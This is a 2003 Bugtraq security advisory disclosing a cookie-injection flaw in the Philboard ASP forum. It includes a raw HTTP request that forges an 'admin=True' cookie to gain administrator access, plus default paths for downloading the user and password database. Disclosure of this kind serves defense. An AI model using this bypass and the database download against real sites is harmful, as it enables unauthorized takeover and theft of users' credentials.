Philboard Forum Vulnerability
aresu_at_bosen.net
Date: 05/29/03
- Previous message: 3APA3A: "ICQLite executable trojaning"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Thu, 29 May 2003 15:48:45 +0700 To: bugtraq@securityfocus.com
Philboard Vulnerability
Severity : High (Possible gain administrator/users access on Forum Board)
Systems Affected: Philboard up to v1.14
Vendor URL: http://www.youngpip.com/philboard.asp
Vuln Type : Cookie Injection
Status : Vendor contacted, fixed version is not available (cause they didn't
response)
Author : AresU
Greetz to : Bosen, Tioeuy, syzwz, Heltz, eF73, SakitJiwa, gembule, muthafuka,
and All 1ndonesian Security Team (1st)
#romance@centrin.net.id
http://www.bosen.net/releases/
Summary
=======
Philboard is freeware forum application under ASP Scripts.
Vulnerable script is on cookie management, all most script is vulnerable for
cookie injection. The cookies are "philboard_admin=True;" or "admin=True;"
Acknowledgments
===============
Vulnerability discovery and advisory by AresU
Vendor Response
===============
Vendor has contacted and fixed version is not available (cause they didn't
reponse)
To Fix the script, you must change every cookie command in to session command.
Exploit Code
============
1) Login Administrator Forum:
Use your telnet and open target on port 80
GET /board/philboard_admin.asp HTTP/1.0
Host: target.com
Cookie: philboard_admin=True;
2) Download the database (users and password):
Usually, the database location can be found and download it from:
http://www.target.com/database/philboard.mdb
or
http://www.target.com/forum/database/philboard.mdb
-----------------------------------------------
This mail sent through http://webmail.bosen.net
- Previous message: 3APA3A: "ICQLite executable trojaning"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
